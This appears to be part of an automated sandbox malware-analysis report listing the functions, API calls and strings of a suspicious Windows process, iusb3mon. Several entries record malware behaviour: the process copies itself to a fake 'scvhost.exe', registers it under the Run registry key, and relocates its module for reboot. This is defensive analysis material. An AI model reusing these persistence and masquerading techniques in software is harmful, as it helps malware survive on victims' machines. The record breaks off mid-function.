Opcode Fuzzy Hash: ae951b8b0ff28d42b3e753f5271b96f8be84706add97276c541d65e276415071
Instruction Fuzzy Hash: 4421C771D00158FFEB609F68D884AAD7F7AEB44794F10816AFB15A6280C7744E46CBA4

Function 06CF8EF1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 79libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?,?,?,?,00000000,06CFADE0,06D0E518,000000FF,?,06CF8D0F), ref: 06CF8F19
GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 06CF8F74
GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 06CF8F81
GetProcAddress.KERNEL32(?,CloseDesktop), ref: 06CF8F8D

Strings

OpenDesktopA, xrefs: 06CF8F79
OpenInputDesktop, xrefs: 06CF8F67, 06CF8F6A
user32.dll, xrefs: 06CF8F14
CloseDesktop, xrefs: 06CF8F85

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
API String ID: 2238633743-3711086354
Opcode ID: 2da8866c09d8782ada1635bb77c4e6d3f0bcccd1b4c0614be52568c57413097c
Instruction ID: e2b42152824a32a3bb1b929598e8667e6914d25d0844bac54ec76760b0700c06
Opcode Fuzzy Hash: 2da8866c09d8782ada1635bb77c4e6d3f0bcccd1b4c0614be52568c57413097c
Instruction Fuzzy Hash: 34318D70D08288FEEF91DBA8D8847DDBFB5AF16758F140169E504B6291C7BA0A08CB71

Function 06CF2A59 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 61filestringCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06CF2A71
CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06CF2AC4
GetFileSize.KERNEL32(00000000,00000000), ref: 06CF2AD1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06CF2AE3
lstrlenA.KERNEL32(06CF2DCE,?,00000000), ref: 06CF2AF1
WriteFile.KERNEL32(00000000,06CF2DCE,00000000), ref: 06CF2AFC
CloseHandle.KERNEL32(00000000), ref: 06CF2B03

Strings

.dat, xrefs: 06CF2A9F

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateFolderHandlePathPointerSizeSpecialWritelstrlen
String ID: .dat
API String ID: 2901490279-100240174
Opcode ID: d1f7dd120bb94fdd895f6854f6bcb3b08730775f3f9c54985c124729c205f2d7
Instruction ID: d1822c74ddfbfb7a2c28d50c6de9a4a31ea52fb1a50e8cdcfaeb89114393b1b0
Opcode Fuzzy Hash: d1f7dd120bb94fdd895f6854f6bcb3b08730775f3f9c54985c124729c205f2d7
Instruction Fuzzy Hash: 0911A072541229BAEBB0ABB0AD4DFDB7F3DEF45750F004450F749E1140DBB48A899BA0

Function 06D02698 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,06D00AB7,?,Microsoft Visual C++ Runtime Library,00012010,?,06D0EAEC,?,06D0EB3C,?,?,?,Runtime Error!Program: ), ref: 06D026AA
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 06D026C2
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 06D026D3
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 06D026E0

Strings

MessageBoxA, xrefs: 06D026BC
user32.dll, xrefs: 06D026A5
GetLastActivePopup, xrefs: 06D026D5
GetActiveWindow, xrefs: 06D026CD

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 6a1caefbd129330f0263cb32395e84de98ced4a4116cab17bc2ff67256a16556
Instruction ID: 5a7b3b4595f86c80eaad033a80672c197daf00a346c7b9407bc82a60b1bf095b
Opcode Fuzzy Hash: 6a1caefbd129330f0263cb32395e84de98ced4a4116cab17bc2ff67256a16556
Instruction Fuzzy Hash: 62014431B01353FFB7619FF99C88B5A7BE9BA986503080429F605D3251D771C505DF61

Function 06D0AFEE Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,06D0B2E8,?,00020000), ref: 06D0AFF7
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 06D0B000
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 06D0B014
#17.COMCTL32 ref: 06D0B02F
#17.COMCTL32 ref: 06D0B04B
FreeLibrary.KERNEL32(00000000), ref: 06D0B057

Strings

InitCommonControlsEx, xrefs: 06D0B00C
COMCTL32.DLL, xrefs: 06D0AFF0, 06D0AFF6, 06D0AFFD

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: 51ba99d28f8b9ccd1430ffa614f04bed9fc002fb40b12f0b145d1809a1476eab
Instruction ID: 8ae3be7856c7ecfcd2c397ec21458e4c96a56362687553c8781902968fdf7d8d
Opcode Fuzzy Hash: 51ba99d28f8b9ccd1430ffa614f04bed9fc002fb40b12f0b145d1809a1476eab
Instruction Fuzzy Hash: 72F0CD32A1C2135B77716F76AD8871B77ADAF856517050826FA51D3340DB21CC098765

Function 06D0322A Relevance: 13.7, APIs: 9, Instructions: 221COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,06D0E7F0,00000001,06D0E7F0,00000001,00000000,06DB119C,06CFAA00,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D03268
CompareStringA.KERNEL32(00000000,00000000,06D26150,00000001,06D26150,00000001,?,?,?,06CFEA70,?,0000000C), ref: 06D03285
CompareStringA.KERNEL32(?,?,00000000,?,0000000C,?,00000000,06DB119C,06CFAA00,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D032E3
GetCPInfo.KERNEL32(06CFEA70,00000000,00000000,06DB119C,06CFAA00,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D03334
MultiByteToWideChar.KERNEL32(06CFEA70,00000009,00000000,?,00000000,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D033B3
MultiByteToWideChar.KERNEL32(06CFEA70,00000001,00000000,?,?,?,?,?,?,06CFEA70,?,0000000C), ref: 06D03414
MultiByteToWideChar.KERNEL32(06CFEA70,00000009,0000000C,?,00000000,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D03427
MultiByteToWideChar.KERNEL32(06CFEA70,00000001,0000000C,?,?,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D03473
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D0348B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 9eb246d6aa48ef5e8b3470c297fbc05be1552579602312572e588953c4bd5c3b
Instruction ID: 1dca46a55df716499635723bc38070f9cb9d7ac5f075ed22032e373c35e5576d
Opcode Fuzzy Hash: 9eb246d6aa48ef5e8b3470c297fbc05be1552579602312572e588953c4bd5c3b
Instruction Fuzzy Hash: 6D718131D0424AFFEFA18F55DC85BEE7FB6EB09210F05442AF951A6290C772C855CB91

Function 06CFE461 Relevance: 13.7, APIs: 9, Instructions: 177COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,06D0E7F0,00000001,00000000,00000000,7622E860,06D2893C,?,00000003,00000000,00000001,00000000,?,?,06D03769), ref: 06CFE4A3
LCMapStringA.KERNEL32(00000000,00000100,06D26150,00000001,00000000,00000000,?,?,06D03769,?), ref: 06CFE4BF
LCMapStringA.KERNEL32(?,?,00000000,00000001,00000000,00000003,7622E860,06D2893C,?,00000003,00000000,00000001,00000000,?,?,06D03769), ref: 06CFE508
MultiByteToWideChar.KERNEL32(?,06D2893D,00000000,00000001,00000000,00000000,7622E860,06D2893C,?,00000003,00000000,00000001,00000000,?,?,06D03769), ref: 06CFE540
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,?,00000000), ref: 06CFE598
LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 06CFE5AE
LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 06CFE5E1
LCMapStringW.KERNEL32(?,?,?,?,?,00000000), ref: 06CFE649

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6fb135de7a7ef363cebfd03c7b83394e70eb1dfb320b21f191145fe33cdbcc58
Instruction ID: 21f2a1f354b3957c2a029b97878efcbda639738e95dd7736ae7cb6c9989d8fdf
Opcode Fuzzy Hash: 6fb135de7a7ef363cebfd03c7b83394e70eb1dfb320b21f191145fe33cdbcc58
Instruction Fuzzy Hash: 00518071910249FFDFA28F96CC45AEEBFB5FB48750F104519FA10A1260E732CA20DBA0

Function 00C05880 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00C020C5,00C020C7,00000000,00000000,22D6AB0D,?,00000000,?,00C08D60,00C29FF8,000000FE,?,00C020C5,?), ref: 00C05909
MultiByteToWideChar.KERNEL32(00000000,00000000,00C020C5,?,00000000,00000000,?,00C08D60,00C29FF8,000000FE,?,00C020C5), ref: 00C05984
SysAllocString.OLEAUT32(00000000), ref: 00C0598F
_com_issue_error.COMSUPP ref: 00C059B8
_com_issue_error.COMSUPP ref: 00C059C2
GetLastError.KERNEL32(80070057,22D6AB0D,?,00000000,?,00C08D60,00C29FF8,000000FE,?,00C020C5,?), ref: 00C059C7
_com_issue_error.COMSUPP ref: 00C059DA
GetLastError.KERNEL32(00000000,?,00C08D60,00C29FF8,000000FE,?,00C020C5,?), ref: 00C059F0
_com_issue_error.COMSUPP ref: 00C05A03

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 295627788c8fcf8313846daed903f02146d83a88ce88d291df4e0b9c94b26758
Instruction ID: 8f98a4c804d9d8c2ee96d604b9a9b28ef54ac250d17061224b4a5c89dfe41fa6
Opcode Fuzzy Hash: 295627788c8fcf8313846daed903f02146d83a88ce88d291df4e0b9c94b26758
Instruction Fuzzy Hash: A541F771A00609EBDB109F69DC45BAFBBA8EF48720F10822AF819D72C1D7349901DFA5

Function 06CF80C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,06CF7EA3), ref: 06CF80EA
GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 06CF80F9
LoadLibraryA.KERNEL32(?,?,?,?,06CF7EA3), ref: 06CF8130
GetProcAddress.KERNEL32(?,7459C083), ref: 06CF81A7
FreeLibrary.KERNEL32(?,06CF7EA3), ref: 06CF81E9

Strings

kernel32.dll, xrefs: 06CF80D5
IsBadReadPtr, xrefs: 06CF80F0

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressLoadProc$Free
String ID: IsBadReadPtr$kernel32.dll
API String ID: 1413238409-2271619998
Opcode ID: 81620edfee722ba8d11e510ea52a0d6289f94a574674e6b3b50d798c788a8d34
Instruction ID: a8031caff7b17673d7a9cd12e8bb727e2b63240e6feacea0eb907682f3e2737f
Opcode Fuzzy Hash: 81620edfee722ba8d11e510ea52a0d6289f94a574674e6b3b50d798c788a8d34
Instruction Fuzzy Hash: D1413D72E11209EFEFA0CF65C8447AABBB9AF44355F188169DE15EB240D730DA44CB90

Function 06D00993 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,06CF8D56), ref: 06D00A00
GetStdHandle.KERNEL32(000000F4,06D0EAEC,00000000,00000000,00000000,06CF8D56), ref: 06D00AD6
WriteFile.KERNEL32(00000000), ref: 06D00ADD

Strings

Runtime Error!Program: , xrefs: 06D00A66
<program name unknown>, xrefs: 06D00A10
..., xrefs: 06D00A52
Microsoft Visual C++ Runtime Library, xrefs: 06D00AAC

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3784150691-4022980321
Opcode ID: 01f1f650935d100dd44c88d38b13d1caa7599c6df19aff8f368923530cbb2255
Instruction ID: f5af315da9e204af80ea7f682017a3e9c1c822eca6c5758923bb71a17b6c9418
Opcode Fuzzy Hash: 01f1f650935d100dd44c88d38b13d1caa7599c6df19aff8f368923530cbb2255
Instruction Fuzzy Hash: E231E472A00218BFFFE0EBA0DC45FEAB76CEB55340F140456F35AD6180E6B0E6849A52

Function 06CF4574 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 63registryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000000,?,?), ref: 06CF45A6
CopyFileA.KERNEL32(00000000,?,00000000), ref: 06CF45D3
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?), ref: 06CF45ED
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000000,00000104,?,?), ref: 06CF4608
RegCloseKey.ADVAPI32(?,?,?), ref: 06CF4611

Strings

C:\Program Files\Common Files\scvhost.exe, xrefs: 06CF45AE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 06CF45E3

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCopyModuleNameOpenValue
String ID: C:\Program Files\Common Files\scvhost.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
API String ID: 3295893203-1226825942
Opcode ID: fc2a9dcbf90c512434c1a5f013ac7c7a9097c5f6d05cbe9a95108b770db3c766
Instruction ID: 9fbcc1257a7c7e982babc2d351e3b2f13e71246109fd14641e0c484ab8a9a0b4
Opcode Fuzzy Hash: fc2a9dcbf90c512434c1a5f013ac7c7a9097c5f6d05cbe9a95108b770db3c766
Instruction Fuzzy Hash: CC113072A4022CBBFF218AA1ED49FDB7B7DEB45750F100465F705A6190DAB15E48CBA0

Function 06CF884F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 47libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF8854
LoadLibraryA.KERNEL32(ws2_32.dll), ref: 06CF8873
GetProcAddress.KERNEL32(00000000,closesocket), ref: 06CF8881
DeleteCriticalSection.KERNEL32(?), ref: 06CF88B2
FreeLibrary.KERNEL32(00000000), ref: 06CF88BD

Strings

ws2_32.dll, xrefs: 06CF886E
closesocket, xrefs: 06CF887B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Library$AddressCriticalDeleteFreeH_prologLoadProcSection
String ID: closesocket$ws2_32.dll
API String ID: 3065476401-181964208
Opcode ID: 46fbc94e2f98af7f9a8217afd77459780479c55fc171b2d2b6d569d3c0c60488
Instruction ID: 2da644aa2edd3d023624d3babbe7949e1f5983c4f8c3705dcfaa5d81333dd9bc
Opcode Fuzzy Hash: 46fbc94e2f98af7f9a8217afd77459780479c55fc171b2d2b6d569d3c0c60488
Instruction Fuzzy Hash: 07019675E10301AFEB949FA8D848B6EB7B9FF44721F100A1EE522A3280D7749608CB51

Function 06CF3D76 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,00000104,06D1CC34), ref: 06CF3D93
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 06CF3DA1
GetTickCount.KERNEL32 ref: 06CF3DA7
wsprintfA.USER32 ref: 06CF3DC1
MoveFileA.KERNEL32(?,?), ref: 06CF3DD8
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 06CF3DE9

Strings

%s\%d.bak, xrefs: 06CF3DBB

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
String ID: %s\%d.bak
API String ID: 830686190-2116986511
Opcode ID: 59b15ddd288ee1945528ef58277d0557f32bc8f069d1f388a255051914d5ec46
Instruction ID: 01f87a67af13bbf8a53686e769d0e9ba8639498db7b28228f5f09cb1d4c43f6d
Opcode Fuzzy Hash: 59b15ddd288ee1945528ef58277d0557f32bc8f069d1f388a255051914d5ec46
Instruction Fuzzy Hash: F8F0F4B6900219ABDB209BA5DE4DFC7B77DEB14301F010591B359D2154DA749698CFA0

Function 06D00828 Relevance: 12.1, APIs: 8, Instructions: 132COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,06CFB640), ref: 06D00843
GetEnvironmentStrings.KERNEL32(?,?,?,?,06CFB640), ref: 06D00857
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,06CFB640), ref: 06D00883
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,06CFB640), ref: 06D008BB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,06CFB640), ref: 06D008DD
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,06CFB640), ref: 06D008F6
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,06CFB640), ref: 06D00909
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 06D00947

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide
String ID:
API String ID: 1823725401-0
Opcode ID: cf11046d1766ffb804204346d3b2791c4161f8e42f1127115c1193ba3703ee97
Instruction ID: 9119e5889d5b1d030d44a3514ad248c9f43f8647c327fd1c17a5d005d9169919
